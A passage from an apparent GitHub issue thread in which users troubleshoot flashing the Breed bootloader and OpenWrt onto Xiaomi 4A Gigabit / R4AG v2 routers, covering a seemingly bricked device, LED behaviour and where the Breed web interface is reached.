finally,  I use command `mtd -r write /tmp/breed.bin Bootloader`
after a while， my device turns to a faint blue light and the ports are unresponsive ， it must be broken. (sad)
I have refered to the  tutorials Links [https://www.right.com.cn/forum/thread-690605-1-1.html]

Do you know the reason for the failure to flash the breed? I have backed up the original system of the router and plan to use the hardware programmer when I have time.

mark4z, 2022-11-09:
> > @MrTaiKe R4AG V2 uses the same breed firmware with R4AG V1, it's `breed-mt7621-pbr-m1.bin `
> 
> thanks for your suggestion. My device is Xiaomi 4A Gigabit (2.30.20). first, I have downloaded the code with the link [here](https://github.com/LordPinhead/OpenWRTInvasion) and successfully got the console via WSL in windows. Then I used mobaxterm to upload [breed-mt7621-pbr-m1.bin](https://breed.hackpascal.net/) to path /tmp finally, I use command `mtd -r write /tmp/breed.bin Bootloader` after a while， my device turns to a faint blue light and the ports are unresponsive ， it must be broken. (sad) I have refered to the [tutorials Links](https://www.right.com.cn/forum/thread-690605-1-1.html)
> 
> Do you know the reason for the failure to flash the breed? I have backed up the original system of the router and plan to use the hardware programmer when I have time.

This breed broken ur leds, so that it's always faint blue light, but do not worry, just try 192.168.1.1 to enter breed gui.

MrTaiKe, 2022-11-09:
@mark4z @fengjiaqi927 
I rewrote my readme.md, probably better instruction to follow.
https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2

R4AGv2 working openwrt bin file (except LED lights)
Download build: wetransfer.com#L1 Download Link: https://we.tl/t-wUdXMxjDBz

@mark4z is right, break gui is at 192.168.1.1, openwrt gui is at 192.168.31.1

MrTaiKe, 2022-11-09:
Xiaomi R4AGv2 router seems working with Openwrt bin, but LED lights are not working properly. Always blue faint lights turned on.....   

Anyone know how to fix this issue?

[38 more replies]